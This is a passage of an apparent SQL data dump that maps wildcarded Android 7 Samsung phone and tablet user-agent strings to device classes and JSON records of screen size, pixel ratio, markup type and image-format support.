like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J320V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J320W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J327T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J327T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J327U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J327V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J327VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J327W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J3300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J3308) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J330F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J330FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J330G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510FN) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510FN) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J510S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J530FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J530G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J530GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J530Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J700P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J700T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J700T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J701F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J701M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J701MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J710FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J710GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J710MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J727P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J727R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J727T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J727T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J727U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J727V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J727VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J730FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J730G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J730GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N9005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N9200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N9208) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N920W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N950N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-N950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-P550) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-P555) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-S337TL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-S737TL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T350) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T355) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T355Y) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T377T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T377V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T380) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T385) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T550) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-T555) AppleWebKit/* (KHTML, like Gecko) Chrome 